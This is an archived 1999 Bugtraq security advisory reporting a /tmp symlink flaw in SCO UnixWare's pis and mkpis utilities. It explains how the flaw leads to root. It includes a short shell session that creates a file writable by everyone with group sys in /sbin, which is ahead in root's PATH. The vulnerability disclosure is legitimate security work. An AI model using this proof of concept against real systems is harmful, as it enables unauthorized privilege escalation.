OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq Archives: Re: UnixWare local pis exploit (mkpis as well)

Re: UnixWare local pis exploit (mkpis as well)

Subject: Re: UnixWare local pis exploit (mkpis as well)
From: Brock Tellier (btellierUSA.NET)
Date: Wed Dec 29 1999 - 10:58:26 CST

As a bonus, /usr/local/bin/mkpis is vulnerable to the same /tmp symlink
problem. It has the same permissions as pis.

-Brock 

---
Brock Tellier <btellierUSA.NET> wrote:
Greetings,

OVERVIEW 
A vulnerability in "/usr/local/bin/pis" on SCO UnixWare will allow any
user to create arbitrary files with group "sys" privileges.  A full root
compromise is then trivial.

BACKGROUND
As usual, I've only tested UnixWare 7.1.

DETAILS

By creating a symlink between /tmp/pisdata and any sys-owned file we can
overwrite that file with ps output.  If we point the symlink at a
non-existant file in a directory which we can write to (such as, say,
/sbin/ls), pis will create this file mode 666 owned by us, group of sys.  

This is a fairly simple compromise.  /sbin is writable by group sys.  We
can create files in /sbin owned by us.  And root's default $PATH starts
with /sbin.

EXPLOIT

bash-2.02$ ls -dal /sbin
drwxrwxr-x    2 root     sys            3072 Dec 28 08:18 /sbin
bash-2.02$ ln -s /sbin/xnec /tmp/pisdata
bash-2.02$ pis
<program output>
bash-2.02$ ls -la /sbin/xnec
-rw-rw-rw-    1 xnec     sys            5896 Dec 28 08:28 /sbin/xnec
bash-2.02$ 

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellierusa.net

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

This archive was generated by hypermail 2b27 : Wed Dec 29 1999 - 19:43:21 CST